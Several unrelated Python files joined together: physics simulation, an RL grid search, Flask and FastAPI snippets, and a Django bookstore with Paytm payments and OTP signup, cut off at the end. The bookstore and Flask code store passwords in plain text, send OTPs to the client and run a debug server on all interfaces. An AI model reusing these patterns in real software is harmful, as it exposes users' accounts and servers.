            # NOTE(review): this is a *separate* if, so when Shaper is
            # 'UMZV Shaped' the final else below also fires and replaces the
            # shaped command with the unshaped one -- confirm intent. The
            # 700/701 sample indices also assume a specific t_step.
            if Shaper == 'ZV Initial Conditions':
                ZV_shape = shaping.ZV(omega_n, zeta).shaper
                in_shape = nz_shape.test_shaper(omega_n,zeta,[X0[0],X0[1]],C[0])
                sys_in[701:len(t)] = shaping.shaped_input(
                    shaping.bang_bang, t[701:len(t)],ZV_shape,
                    C[0],C[1],Distance[i], StartTime[j]
                )
                sys_in[0:700] = shaping.shaped_input(
                    shaping.bang_bang, t[0:700],in_shape,
                    C[0],C[1],Distance[i], StartTime[j]
                )
            elif Shaper == 'ZV Shaped':
                in_shape = shaping.ZV(omega_n, zeta).shaper
                sys_in[Start_step[j]:-1] = shaping.shaped_input(
                    shaping.bang_bang, t[Start_step[j]:-1],in_shape,
                    C[0],C[1],Distance[i], StartTime[j]
                )
            elif Shaper == 'EI Shaped':
                in_shape = shaping.EI(omega_n, zeta).shaper
                sys_in[Start_step[j]:-1] = shaping.shaped_input(
                    shaping.bang_bang, t[Start_step[j]:-1],in_shape,
                    C[0],C[1],Distance[i], StartTime[j]
                )
            else:
                sys_in = unshaped_input
            # Generate the response
            response = odeint(
                eq_motion, X0, t, args=(sys_in,t,l),
                atol=abserr, rtol=relerr, hmax=t_step
            )
            # Calculate the residual amplitude (half the peak-to-peak swing of theta)
            Amp[i,j] = (np.amax(response[:,0]) - np.amin(response[:,0])) / 2
    return response, Amp
def eq_motion(X, t, sys_in, t_sys, length):
    '''
    Returns the state-space equations of motion for the system.

    Inputs:
        X - State variables [theta, theta_dot, x, x_dot]
        t - Current system time
        sys_in - Acceleration input commanded to the system
        t_sys - total time array for the system. Used to interpolate the current time
        length - length of the pendulum

    Returns:
        [theta_dot, theta_ddot, x_dot, x_ddot] for the linearized pendulum.
    '''
    # Grab the state Variables
    theta, theta_dot, x, x_dot = X
    # Default: no commanded trolley acceleration.
    xddot = 0.0
    # BUGFIX: the original guard was `len(sys_in) != 0 and sys_in.any != -1`,
    # which compares the *bound method* `any` to -1 (always True), and left
    # `xddot` undefined (NameError) whenever sys_in was empty. Interpolating
    # for any non-empty sys_in preserves the original observable behavior
    # while making the empty case well defined.
    if len(sys_in) != 0:
        # Interpolate the commanded acceleration at the current time.
        xddot = np.interp(t, t_sys, sys_in)
    # Evaluate the differential equations of motion
    ODE = [theta_dot,
           - 1 / length * xddot - G / length * theta,
           x_dot,
           xddot]
    return ODE
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2017-11-29 21:22
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated migration: drops thirteen assessment/condition fields
    (appetite, cancer, chf, created_by, eating, hygiene, memory, mobility,
    nephrologist, snf, sob, toileting, weight_loss) from the Patient model.

    Generated by Django; do not edit the operations by hand.
    """

    dependencies = [
        ('LariatApp', '0001_initial'),
    ]
    operations = [
        migrations.RemoveField(
            model_name='patient',
            name='appetite',
        ),
        migrations.RemoveField(
            model_name='patient',
            name='cancer',
        ),
        migrations.RemoveField(
            model_name='patient',
            name='chf',
        ),
        migrations.RemoveField(
            model_name='patient',
            name='created_by',
        ),
        migrations.RemoveField(
            model_name='patient',
            name='eating',
        ),
        migrations.RemoveField(
            model_name='patient',
            name='hygiene',
        ),
        migrations.RemoveField(
            model_name='patient',
            name='memory',
        ),
        migrations.RemoveField(
            model_name='patient',
            name='mobility',
        ),
        migrations.RemoveField(
            model_name='patient',
            name='nephrologist',
        ),
        migrations.RemoveField(
            model_name='patient',
            name='snf',
        ),
        migrations.RemoveField(
            model_name='patient',
            name='sob',
        ),
        migrations.RemoveField(
            model_name='patient',
            name='toileting',
        ),
        migrations.RemoveField(
            model_name='patient',
            name='weight_loss',
        ),
    ]
|
from game.items.item import Log
from game.skills import SkillTypes
class MapleLog(Log):
    """Maple Log item definition (a Log subclass with maple-specific stats)."""
    name = 'Maple Log'
    # Item value -- presumably base price in coins; confirm against Item/Log.
    value = 97
    # XP granted per skill when the log is used (burned / fletched).
    xp = {SkillTypes.firemaking: 135.5, SkillTypes.fletching: 1}
    # Minimum skill levels required to use the log with each skill.
    skill_requirement = {SkillTypes.firemaking: 45, SkillTypes.fletching: 1}
from edualgo import print_msg_box
class combinationsDict(dict):
    """Self-memoizing dict mapping (n, r) -> nCr.

    Missing keys are computed on demand via Pascal's rule,
    C(n, r) = C(n-1, r-1) + C(n-1, r), and cached in the dict itself,
    so repeated lookups are O(1).
    """

    def __missing__(self, k):
        """Compute, cache and return C(n, r) for the key k == (n, r)."""
        n, r = k
        if r == 0 or r == n:
            value = 1
        else:
            value = self[n-1, r-1] + self[n-1, r]
        self[k] = value
        return value

    @property
    def hint(self):
        """Print a usage/definition summary for this class."""
        message = """
        ------formal definition------
        number of combinations is defined as:
        The number of selections of a given number of elements from a larger number without regard to their arrangement.
        for r elements to be selected from n elements, number of combinations is denoted by nCr
        nCr = (n!)/((r!)*(n-r)!)
        ------recursive definition------
        C(n, r) = C(n-1, r-1) + C(n-1, r)
        base case: C(n, 0) = C(n, n) = 1
        ------usage------
        obj = combinationsDict()
        print("3C2 =",obj[3,2])
        """
        print_msg_box(message)
|
#!/usr/bin/python3
def multiple_returns(sentence):
    """Return a (length, first element) tuple for *sentence*.

    An empty sequence yields (0, None).
    """
    if len(sentence) == 0:
        return (0, None)
    return len(sentence), sentence[0]
|
### this contains a test python file
print("Hello world")  # FIX: corrected "Hellow" typo in the printed message
|
# coding: utf-8
# In[1]:
import sys
sys.path.append("../")  # make the local gym_ianna package importable
# In[2]:
import numpy as np, pandas as pd
import gym
from gym_ianna.envs.ianna_env import IANNAEnv
import tensorflow as tf
# In[3]:
import gym_ianna.envs.ianna_env as ianna_env
ianna_env.__file__  # notebook cell: shows which module file was loaded
# In[4]:
# Default hyper-parameters; per-run overrides come from `grid` below.
default_args = {
    'ENV': 'IANNA-v0'
    ,'START_STATE_FROM': 0 # last 15 bits of the IANNA state are the groupby bits
    ,'OP_NUMBER' : 15 # how many fields can we turn on
    ,'STATE_INPUT_SIZE' : 51 # how many fields can we observe
    ,'MAX_STEPS' : 5 # how many steps must we play in each episode
    #nn params
    ,'HIDDEN_SIZE': 20
    ,'HIDDEN_LAYERS' : 1
    #discount rewards params
    ,'GAMMA' : 0.99
    #ADAM Optimizer hyper-parameters:
    ,'LEARNING_RATE' : 0.01
    ,'B1' : 0.8
    ,'B2' : 0.999
    ,'EPSILON' : 1e-6
    #learning params
    ,'TOTAL_EPISODES' : 10000
    ,'BATCH_NUMBER' : 20
    ,'DISPLAY_FREQ' : 500
}
# Grid search over GAMMA: ten values in [0, 1), two repetitions each.
grid = []
for gamma in np.arange(0, 1, 0.1):
    for _ in range(2):
        grid.append({
            'GAMMA': gamma
        })
res_list = []  # one result dict (args + recorded metrics) per grid entry
# Run one full build+train cycle per grid configuration.
for g in grid:
    # Merge this grid point into a fresh copy of the defaults.
    args = default_args.copy()
    args.update(g)
    print('*'*80)
    print(args)
    env = gym.make(args['ENV'])
    # In[5]:
    #Initializing
    # Build a fresh TF1 policy-network graph for this configuration:
    # 1 or 2 tanh hidden layers, softmax over OP_NUMBER actions.
    tf.reset_default_graph()
    W1 = tf.get_variable(shape=[args['HIDDEN_SIZE'],args['STATE_INPUT_SIZE']],name='w1',
                         initializer=tf.contrib.layers.xavier_initializer())
    if args['HIDDEN_LAYERS'] == 2:
        W2 = tf.get_variable(shape=[args['HIDDEN_SIZE'],args['HIDDEN_SIZE']],name='w2',
                             initializer=tf.contrib.layers.xavier_initializer())
    W3 = tf.get_variable(shape=[args['OP_NUMBER'],args['HIDDEN_SIZE']],name='w3',
                         initializer=tf.contrib.layers.xavier_initializer())
    b1 = tf.get_variable(shape=[args['HIDDEN_SIZE'],1],name='b1',
                         initializer=tf.contrib.layers.xavier_initializer())
    if args['HIDDEN_LAYERS'] == 2:
        b2 = tf.get_variable(shape=[args['HIDDEN_SIZE'],1],name='b2',
                             initializer=tf.contrib.layers.xavier_initializer())
    b3 = tf.get_variable(shape=[args['OP_NUMBER'],1],name='b3',
                         initializer=tf.contrib.layers.xavier_initializer())
    #Layers:
    # Input is column-major: one observation per column.
    x = tf.placeholder(tf.float32, shape=[args['STATE_INPUT_SIZE'],None],name='x')
    h1 = tf.tanh(tf.matmul(W1,x) + b1)
    if args['HIDDEN_LAYERS'] == 2:
        h2 = tf.tanh(tf.matmul(W2,h1) + b2)
        y = tf.nn.softmax(tf.matmul(W3,h2) + b3,dim=0)
    else:
        y = tf.nn.softmax(tf.matmul(W3,h1) + b3,dim=0)
    # In[6]:
    saver = tf.train.Saver()
    sess = tf.InteractiveSession()
    # In[7]:
    #Loss function:
    # REINFORCE objective: maximize mean(log pi(a|s) * discounted reward),
    # implemented as a minimized negative mean.
    curr_reward = tf.placeholder(shape=[None],dtype=tf.float32)
    actions_array = tf.placeholder(shape=[None],dtype=tf.int32)
    pai_array = tf.gather(y,actions_array)
    L = -tf.reduce_mean(tf.log(pai_array)*curr_reward)
    gradient_holders = []
    gradients = tf.gradients(L,tf.trainable_variables())
    # In[8]:
    tvars = tf.trainable_variables()
    #Initialize gradient placeholders, one per trainable variable:
    for idx,var in enumerate(tvars):
        placeholder = tf.placeholder(tf.float32,name=str(idx)+'_holder')
        gradient_holders.append(placeholder)
    # In[9]:
    #Update mechanism: Adam applies the externally accumulated gradients.
    adam = tf.train.AdamOptimizer(learning_rate=args['LEARNING_RATE'],beta1=args['B1'],beta2=args['B2'],epsilon=args['EPSILON'])
    update_batch = adam.apply_gradients(zip(gradient_holders,tvars))
    # In[10]:
    # grad buffer is initialized to all zeros.
    # It's used to accumulate the gradients and is a regular variable, NOT a tf variable
    def reset_graph():
        # (Re)initialize all TF variables in the current session.
        init = tf.global_variables_initializer()
        sess.run(init)
        #saver.restore(sess, "../models/ianna-nn-supervised")
    reset_graph()
    # Seed the buffer with correctly-shaped arrays (current variable values).
    grad_buffer = sess.run(tf.trainable_variables())
    def reset_grad_buffer():
        # Zero the accumulated gradients in place, keeping the shapes.
        for ix,grad in enumerate(grad_buffer):
            grad_buffer[ix] = grad * 0
    # In[11]:
    def get_action(sess,observation):
        """
        Given an observation, return an action index sampled according to
        the probabilities of the NN softmax output.
        """
        # Feed the observation as a single column vector.
        a_dist = sess.run(y,feed_dict={x:np.reshape(observation,(args['STATE_INPUT_SIZE'], 1))})
        a = np.random.choice(range(args['OP_NUMBER']),p=a_dist.reshape((args['OP_NUMBER'])))
        return a
    # In[12]:
    def train(sess,cur_states_array,cur_actions_array,cur_curr_reward):
        """
        NN training procedure: Given arrays of states(observations),
        actions and rewards it computes the derivatives of the loss function
        then adds the derivative values to the gradient buffer.
        Returns None; the actual variable update happens in update().
        """
        G = sess.run(gradients,feed_dict={x:cur_states_array,actions_array:cur_actions_array,curr_reward:cur_curr_reward})
        for idx,grad in enumerate(G):
            grad_buffer[idx] += grad
    # In[13]:
    def update(sess):
        """
        NN update procedure: apply the accumulated grad_buffer gradients
        to the NN variables via the Adam apply_gradients op.
        """
        feed_dict = dict(zip(gradient_holders, grad_buffer))
        _ = sess.run(update_batch, feed_dict=feed_dict)
    # In[14]:
    # IANNA actions would be:
    # 0) action_type: back[0], filter[1], group[2]
    # 1) col_id: [0..num_of_columns-1]
    # 2) filter_operator: LT[0], GT[1] if the selected column was numeric (maybe change semantics if column is STR?)
    # 3) filter_decile: [0..9] the filter operand
    # 4) aggregation column_id: [0..num_of_columns - 1] (what do we do if the selected col is also grouped_by?)
    # 5) aggregation type: MEAN[0], COUNT[1], SUM[2], MIN[3], MAX[4]
    def build_ianna_action_from_grouped_by_field(grouped_by_field):
        # Always a "group" action (type 2) on the given column; other slots zeroed.
        action = [2, grouped_by_field, 0, 0, 0, 0]
        return action
    # In[21]:
    def project_state_to_nn_input(x):
        # Slice out the observation window the policy network actually sees.
        # NOTE(review): the parameter shadows the module-level placeholder `x`.
        return x[args['START_STATE_FROM']:args['START_STATE_FROM']+args['STATE_INPUT_SIZE']]
    # In[22]:
    def discount_rewards(arr):
        """
        Helper function for computing discounted rewards over one episode
        (the normalization by mean/std is deliberately disabled below).
        """
        discounts = np.zeros_like(arr)
        reward = 0
        for i in reversed(range(arr.size)):
            # NOTE(review): this also discounts the immediate reward
            # (reward = GAMMA*(r_i + R)); the textbook return is
            # r_i + GAMMA*R -- confirm the deviation is intentional.
            reward=args['GAMMA']*(arr[i]+reward)
            discounts[i] = reward
        # following 3 lines destroy everything when the game is really simple:
        # pick 4 fields out of 5 without repeating yourself
        #mean = np.mean(discounts,keepdims=True)
        #discounts = discounts - mean
        #discounts = discounts/ np.std(discounts)
        return discounts
    # In[28]:
    # Main REINFORCE loop for this grid configuration: play BATCH_NUMBER
    # episodes, accumulate their gradients, then apply one batched update.
    episode_number = 0
    rewards = []
    steps=[]
    max_reward=0
    reset_graph()
    reset_grad_buffer()
    while episode_number < args['TOTAL_EPISODES']:
        for ep in range(args['BATCH_NUMBER']):
            obsrv = project_state_to_nn_input(env.reset())
            ep_history=[]
            step_num=0
            total_reward=0
            done=False
            while not done and step_num < args['MAX_STEPS']:
                #Perform the game "step:"
                step_num+=1
                action = get_action(sess,obsrv)
                # IANNA needs the scalar action wrapped in its 6-slot format.
                if args['ENV'] == 'IANNA-v0':
                    complex_action = build_ianna_action_from_grouped_by_field(action)
                    obsrv1, reward, done, info = env.step(complex_action)
                else:
                    obsrv1, reward, done, info = env.step(action)
                total_reward+=reward
                ep_history.append((np.array(obsrv),action,reward))
                obsrv=project_state_to_nn_input(obsrv1)
            episode_number+=1
            # Replace raw per-step rewards with discounted returns.
            ep_history= np.array(ep_history)
            ep_history[:,2] = discount_rewards(ep_history[:,2])
            """
            perform the training step,
            feeding the network with the ep_history that contains
            the states,actions, and discounted rewards
            """
            ep_states_array = np.vstack(ep_history[:,0]).T
            ep_actions_array = ep_history[:,1].T
            ep_curr_reward = ep_history[:,2].T
            # NOTE(review): train() returns None, so L is always None here.
            L=train(sess, ep_states_array, ep_actions_array, ep_curr_reward)
            #update the rewards/steps counter, storing the data for all episodes
            rewards.append(total_reward)
            steps.append(step_num)
            if episode_number%args['DISPLAY_FREQ']==0:
                print("latest game actions: ", ep_actions_array.T)
                print("latest game reward: ", total_reward)
                print("latest game first state: ", ep_states_array.T[0])
                print("latest game last state: ", obsrv)
                print("Total episodes: %d"%episode_number)
                print("Average steps per %d episodes: %f"%(args['DISPLAY_FREQ'], np.mean(steps[-args['DISPLAY_FREQ']:])))
                print("Average reward per %d episodes : %f"%(args['DISPLAY_FREQ'], np.mean(rewards[-args['DISPLAY_FREQ']:])))
                # Record the running average into args for the results CSV.
                args['AVERAGE_REWARD_%d' % episode_number] = np.mean(rewards[-args['DISPLAY_FREQ']:])
        # Apply the batch's accumulated gradients, then clear the buffer.
        update(sess)
        reset_grad_buffer()
        if np.mean(rewards[-args['BATCH_NUMBER']:])>max_reward:
            max_reward=np.mean(rewards[-args['BATCH_NUMBER']:])
            print("\t\t\tCurr Max mean reward per batch:",max_reward)
    res_list.append(args)
# Persist the grid-search results (one row per configuration).
res = pd.DataFrame(res_list)
res.to_csv('grid_search_rl.csv')
# In[ ]:
# NOTE(review): only the session from the last grid iteration is closed here.
sess.close()
|
from flask import Flask, render_template, request, Response
app = Flask(__name__)
@app.route("/")
def index():
    """Serve the main page."""
    return render_template("index.html")
@app.route("/post_coord", methods=["POST"])
def get_coord():
    """Log an (x, y) coordinate posted as form data and acknowledge."""
    x = request.form["x"]
    y = request.form["y"]
    print("x:{}, y:{}".format(x, y))
    return "200 OK"
# NOTE(review): app.run() executes unconditionally (no __main__ guard) and
# with debug=True; confirm this script is never imported or deployed as-is.
app.run(host="0.0.0.0", port=8000, debug=True,
        threaded=True, use_reloader=False)
from fastapi import APIRouter
from fastapi.param_functions import Depends
from pydantic.main import BaseModel
from datetime import date
from ....domain.controller import create_invite_controller
from ..middlewares import ensure_authenticated
class Dto(BaseModel):
    """Request payload for creating an invite."""
    # NOTE(review): the field name shadows the imported `date` type; pydantic
    # still resolves the annotation, but later fields could not use it.
    date: date  # requested date of the invite
    artist_id: str  # id of the artist being invited
    # Venue location and address details.
    latitude: float
    longitude: float
    postal_code: str
    address: str
    address_number: int
create_invite_router = APIRouter()
@create_invite_router.post("/invites")
async def execute(request: Dto, auth_user = Depends(ensure_authenticated)):
    """Create an invite on behalf of the authenticated establishment.

    Merges the request body with the caller's user id (used as
    establishment_id) and delegates to the domain controller.
    """
    dto = {
        **request.__dict__,
        "establishment_id": auth_user.user_id
    }
    return create_invite_controller.handle(dto)
|
from django.shortcuts import render,redirect
from .models import Contact,User,Book,Cart,Wishlist,Transaction
from django.conf import settings
from django.core.mail import send_mail
import random
from .paytm import generate_checksum, verify_checksum
from django.views.decorators.csrf import csrf_exempt
def initiate_payment(request):
    """Start a Paytm payment.

    GET renders the payment form; POST creates a Transaction for the
    session's user, signs the Paytm parameters with a checksum, and renders
    the auto-submitting redirect page.
    """
    if request.method == "GET":
        return render(request, 'myapp/pay.html')
    try:
        amount = int(request.POST['amount'])
    except:
        # Missing or non-numeric amount: re-show the form with an error.
        return render(request, 'myapp/pay.html', context={'error': 'Wrong Accound Details or amount'})
    user=User.objects.get(email=request.session['email'])
    transaction = Transaction.objects.create(made_by=user, amount=amount)
    transaction.save()
    merchant_key = settings.PAYTM_SECRET_KEY
    # Parameters required by the Paytm checkout API.
    params = (
        ('MID', settings.PAYTM_MERCHANT_ID),
        ('ORDER_ID', str(transaction.order_id)),
        ('CUST_ID', str(user.email)),
        ('TXN_AMOUNT', str(transaction.amount)),
        ('CHANNEL_ID', settings.PAYTM_CHANNEL_ID),
        ('WEBSITE', settings.PAYTM_WEBSITE),
        # ('EMAIL', request.user.email),
        # ('MOBILE_N0', '9911223388'),
        ('INDUSTRY_TYPE_ID', settings.PAYTM_INDUSTRY_TYPE_ID),
        ('CALLBACK_URL', 'http://127.0.0.1:8000/callback/'),
        # ('PAYMENT_MODE_ONLY', 'NO'),
    )
    paytm_params = dict(params)
    # Sign the parameters; Paytm verifies this checksum server-side.
    checksum = generate_checksum(paytm_params, merchant_key)
    transaction.checksum = checksum
    transaction.save()
    paytm_params['CHECKSUMHASH'] = checksum
    print('SENT: ', checksum)
    return render(request, 'myapp/redirect.html', context=paytm_params)
@csrf_exempt
def callback(request):
    """Paytm payment callback: verify the returned checksum and render the
    result page with a Matched/Mismatched message."""
    if request.method == 'POST':
        received_data = dict(request.POST)
        paytm_params = {}
        paytm_checksum = received_data['CHECKSUMHASH'][0]
        for key, value in received_data.items():
            if key == 'CHECKSUMHASH':
                # NOTE(review): redundant -- already captured above.
                paytm_checksum = value[0]
            else:
                paytm_params[key] = str(value[0])
        # Verify checksum over every field except CHECKSUMHASH itself.
        is_valid_checksum = verify_checksum(paytm_params, settings.PAYTM_SECRET_KEY, str(paytm_checksum))
        if is_valid_checksum:
            received_data['message'] = "Checksum Matched"
        else:
            received_data['message'] = "Checksum Mismatched"
        return render(request, 'myapp/callback.html', context=received_data)
def index(request):
    """Landing page: route to the user or seller home based on session.

    Falls back to the login page when no session user exists, the
    session email is stale, or the usertype is unrecognised (the
    original returned None in that last case, causing a 500).
    """
    try:
        if request.session['email']:
            user = User.objects.get(email=request.session['email'])
            print(user)
            if user.usertype == "user":
                return render(request, 'myapp/index.html')
            elif user.usertype == "seller":
                return render(request, 'myapp/seller_index.html')
    except (KeyError, User.DoesNotExist):
        # Not logged in (missing session key) or stale email in session.
        return render(request, 'myapp/login.html')
    # Unknown usertype: send to login rather than returning None.
    return render(request, 'myapp/login.html')
def _category_page(request, category):
    """Render the listing template for one book category.

    The template is named after the category (python.html, java.html,
    php.html), matching the originals exactly.
    """
    books = Book.objects.filter(book_category=category)
    return render(request, 'myapp/%s.html' % category, {'books': books})

def python(request):
    """List all books in the 'python' category."""
    return _category_page(request, 'python')

def java(request):
    """List all books in the 'java' category."""
    return _category_page(request, 'java')

def php(request):
    """List all books in the 'php' category."""
    return _category_page(request, 'php')
def login(request):
    """Authenticate a user or seller and populate the session.

    NOTE(security): the model stores and compares passwords in plain
    text; migrating to Django's hashed auth is strongly advised.
    """
    if request.method == "POST":
        email = request.POST['email']
        password = request.POST['password']
        try:
            user = User.objects.get(email=email, password=password)
        except User.DoesNotExist:
            # The original bare except also swallowed template/session
            # errors as "wrong credentials"; only a failed lookup
            # should produce this message.
            msg = "Email and password does not exist."
            return render(request, 'myapp/login.html', {'msg': msg})
        if user.status == "active" and user.usertype == "user":
            mycart = Cart.objects.filter(user=user)
            request.session['cartcount'] = len(mycart)
            request.session['fname'] = user.first_name
            request.session['email'] = user.email
            request.session['user_image'] = user.user_image.url
            return render(request, 'myapp/index.html')
        elif user.status == "active" and user.usertype == "seller":
            request.session['fname'] = user.first_name
            request.session['email'] = user.email
            request.session['user_image'] = user.user_image.url
            return render(request, 'myapp/seller_index.html')
        else:
            # Account exists but was never OTP-verified.
            msg = "you still not verify your account"
            return render(request, 'myapp/enter_email.html', {'msg': msg})
    else:
        return render(request, 'myapp/login.html')
def signup(request):
    """Register a new user/seller and e-mail them a 4-digit OTP.

    A throwaway unsaved User() instance is used purely as a form-data
    holder (fname/lname/cpassword are plain attributes, not all model
    fields); the real row is created via objects.create below.
    NOTE(security): the OTP is passed into the template context, so it
    reaches the client — verification should be server-side only.
    """
    if request.method=="POST":
        user=User()
        user.usertype=request.POST['usertype']
        user.fname=request.POST['fname']
        user.lname=request.POST['lname']
        user.email=request.POST['email']
        user.mobile=request.POST['mobile']
        user.password=request.POST['password']
        user.cpassword=request.POST['cpassword']
        user.user_image=request.FILES['user_image']
        # Reject duplicate registrations by e-mail.
        a=User.objects.filter(email=user.email)
        if a:
            msg="Email alrady exist"
            return render(request,'myapp/login.html',{'msg':msg})
        elif user.password==user.cpassword:
            User.objects.create(first_name=user.fname,last_name=user.lname,email=user.email,password=user.password,cpassword=user.cpassword,mobile=user.mobile,usertype=user.usertype,user_image=user.user_image)
            rec=[user.email,]
            subject="OTP for Registration"
            otp=random.randint(1000,9999)
            message="your OTP for Registration is "+str(otp)
            email_from=settings.EMAIL_HOST_USER
            send_mail(subject,message,email_from,rec)
            return render(request,'myapp/verify_otp.html',{'otp':otp,'email':user.email})
        else:
            # Re-show the form with the entered values preserved.
            msg="Password and Confirm Password Doen't Match"
            return render(request,'myapp/signup.html',{'msg':msg,'user':user})
    else:
        return render(request,'myapp/signup.html')
def contact(request):
    """Save a contact-form submission (POST) or list all messages (GET)."""
    if request.method != "POST":
        contacts = Contact.objects.all().order_by("-id")
        return render(request, 'myapp/contact.html', {'contacts': contacts,})
    Contact.objects.create(
        name=request.POST['name'],
        email=request.POST['email'],
        mobile=request.POST['mobile'],
        remarks=request.POST['remarks'],
    )
    # Redirect-after-POST so a browser refresh does not resubmit.
    return redirect("contact")
def verify_otp(request):
    """Compare the OTP shown to the user with what they typed back.

    'otp' is the generated code and 'u_otp' the user's entry; both
    arrive as POST strings, so they are compared as strings.  A match
    either activates a fresh account or, for an already-active account
    (forgot-password flow), leads to the new-password form.
    """
    otp=request.POST['otp']
    email=request.POST['email']
    u_otp=request.POST['u_otp']
    if otp==u_otp:
        user=User.objects.get(email=email)
        if user.status=="active":
            # Already active: this is the password-reset path.
            return render(request,"myapp/new_password.html",{'email':email})
        else:
            user.status="active"
            user.save()
            msg="Your account now Active"
            return render(request,"myapp/login.html",{'msg':msg})
    else:
        msg="entered OTP is incorrect Please re-enter your correct OTP"
        return render(request,"myapp/verify_otp.html",{'otp':otp,'email':email,'msg':msg})
def logout(request):
    """Clear the login session keys and show the login page.

    Uses session.pop() with a default so a missing key (user was not
    logged in) no longer aborts: the original caught the KeyError with
    `except: pass` and fell through, returning None (a 500 in Django).
    """
    request.session.pop('fname', None)
    request.session.pop('email', None)
    return render(request, 'myapp/login.html')
def enter_email(request):
    """Show the form asking for the e-mail address to send an OTP to."""
    template_name = 'myapp/enter_email.html'
    return render(request, template_name)
def forgot_password(request):
    """Set a new password after OTP verification.

    Expects POST fields 'email', 'password', 'cpassword'.  Mismatched
    passwords re-render the new-password form; an unknown e-mail now
    shows the login page (the original swallowed the lookup failure
    with `except: pass` and returned None, a 500).
    """
    email = request.POST['email']
    password = request.POST['password']
    cpassword = request.POST['cpassword']
    if password == cpassword:
        try:
            user = User.objects.get(email=email)
        except User.DoesNotExist:
            return render(request, 'myapp/login.html')
        # NOTE(security): stored in plain text, matching the model's
        # existing convention.
        user.password = password
        user.cpassword = cpassword
        user.save()
        msg = "Password Updated Succeed"
        return render(request, 'myapp/login.html', {'msg': msg})
    else:
        msg = "Password and Confirm Password not matched"
        return render(request, 'myapp/new_password.html', {'msg': msg, 'email': email})
def send_otp(request):
    """E-mail a 4-digit OTP to the given address, if it is registered.

    NOTE(review): both excepts are bare, so the outer one reports
    "email does not exist" for any failure in the block, and the OTP is
    placed in the template context (reaches the client) — flag for a
    follow-up fix.
    """
    email=request.POST['email']
    try:
        user=User.objects.get(email=email)
        if user:
            rec=[email,]
            subject="OTP for validation"
            otp=random.randint(1000,9999)
            message="your OTP for Registration is "+str(otp)
            email_from=settings.EMAIL_HOST_USER
            try:
                # SMTP failure is reported as a network issue.
                send_mail(subject,message,email_from,rec)
                return render(request,'myapp/verify_otp.html',{'otp':otp,'email':email})
            except:
                msg="Network issue."
                return render(request,'myapp/login.html',{'msg':msg})
    except:
        msg="email does not exist."
        return render(request,'myapp/login.html',{'msg':msg})
def change_password(request):
    """Let the logged-in user change their password, then force re-login.

    Validates the old password and that the two new entries match; on
    success the session is cleared so the user must log in again.
    NOTE(review): passwords are compared/stored in plain text, per the
    model's existing convention.
    """
    if request.method=="POST":
        user=User.objects.get(email=request.session['email'])
        old_password=request.POST['old_password']
        new_password=request.POST['new_password']
        new_cpassword=request.POST['new_cpassword']
        if user.password!=old_password:
            msg="old Password is doesn't match"
            return render(request,'myapp/change_password.html',{'msg':msg})
        elif new_password!=new_cpassword:
            msg="New Password & Confirm Password Doesn't Match"
            return render(request,'myapp/change_password.html',{'msg':msg})
        else:
            user.password=new_password
            user.cpassword=new_cpassword
            user.save()
            try:
                # Log the user out; if the keys are already gone the
                # bare except falls through to the final render below.
                del request.session['fname']
                del request.session['email']
                msg="Password changed successfully.Please login again"
                return render(request,'myapp/login.html',{'msg':msg})
            except:
                pass
    return render(request,'myapp/change_password.html')
def add_book(request):
    """Seller view: create a Book from the submitted form (POST) or
    show the empty form (GET).

    The seller is identified by the e-mail stored in the session.
    """
    if request.method == "POST":
        bc = request.POST['book_category']
        bn = request.POST['book_name']
        bp = request.POST['book_price']
        ba = request.POST['book_author']
        bd = request.POST['book_desc']
        bi = request.FILES['book_image']
        bse = request.session['email']
        # The original statement ended with a stray comma, wrapping the
        # create() call in a throwaway 1-tuple; removed.
        Book.objects.create(book_category=bc, book_name=bn, book_price=bp,
                            book_author=ba, book_desc=bd, book_image=bi,
                            book_seller_email=bse)
        msg = "Book Added successfully"
        return render(request, 'myapp/add_book.html', {'msg': msg})
    else:
        return render(request, 'myapp/add_book.html')
def seller_index(request):
    """Render the seller's landing page."""
    template_name = 'myapp/seller_index.html'
    return render(request, template_name)
def view_book(request):
    """List the active books belonging to the logged-in seller."""
    seller_email = request.session["email"]
    active_books = Book.objects.filter(book_status="active",
                                       book_seller_email=seller_email)
    return render(request, 'myapp/view_book.html', {'books': active_books})
def book_detail(request, pk):
    """Seller-side detail page for the book with primary key `pk`."""
    selected = Book.objects.get(pk=pk)
    return render(request, 'myapp/book_detail.html', {'books': selected})
def delete_book(request, pk):
    """Soft-delete one book (mark it inactive), then show the seller's
    remaining active books."""
    book = Book.objects.get(pk=pk)
    book.book_status = "inactive"
    book.save()
    remaining = Book.objects.filter(book_status="active",
                                    book_seller_email=request.session["email"])
    return render(request, 'myapp/view_book.html',
                  {'msg': "Book Inactivated successfully.", 'books': remaining})
def inactive_book(request):
    """List every book that has been soft-deleted (status 'inactive')."""
    hidden = Book.objects.filter(book_status="inactive")
    return render(request, 'myapp/inactive_book.html', {'books': hidden})
def active_book(request,pk):
    """Re-activate a soft-deleted book, then show the inactive list.

    NOTE(review): this renders view_book.html but passes the *inactive*
    queryset, unlike delete_book which passes the active one — looks
    like it was meant to render inactive_book.html (or query active
    books); confirm against the template before changing.
    """
    books=Book.objects.get(pk=pk)
    books.book_status="active"
    books.save()
    books=Book.objects.filter(book_status="inactive")
    msg="book Activated successfully"
    return render(request,'myapp/view_book.html',{'msg':msg,'books':books})
def search_book(request):
    """Search active books by category substring.

    Sellers see only their own matches (more_details.html); buyers see
    all matches (view_book.html).
    NOTE(review): a GET request raises on request.POST["search"] before
    the try, and the except path prints and returns None (500) — both
    flagged for a follow-up fix.
    """
    search=request.POST["search"]
    try:
        user=User.objects.get(email=request.session['email'])
        if user.usertype=='seller':
            books=Book.objects.filter(book_status="active",book_category__contains=search,book_seller_email=request.session["email"])
            return render(request,'myapp/more_details.html',{'books':books})
        else:
            books=Book.objects.filter(book_status="active",book_category__contains=search)
            return render(request,'myapp/view_book.html',{'books':books})
    except Exception as e:
        print(e)
def profile(request):
    """Show (GET) or update (POST) the logged-in user's profile.

    On POST the user is looked up by the *submitted* e-mail, the name,
    mobile and optional image are updated, and the session copies of
    those values are refreshed.
    """
    if request.method=="POST":
        first_name=request.POST['fname']
        last_name=request.POST['lname']
        mobile=request.POST['mobile']
        email=request.POST['email']
        user=User.objects.get(email=email)
        try:
            # No file uploaded raises (MultiValueDictKeyError); the
            # except keeps the existing image in that case.
            if request.FILES['user_image']:
                user_image=request.FILES['user_image']
        except:
            user_image=user.user_image
        user.user_image=user_image
        user.first_name=first_name
        user.last_name=last_name
        user.mobile=mobile
        user.save()
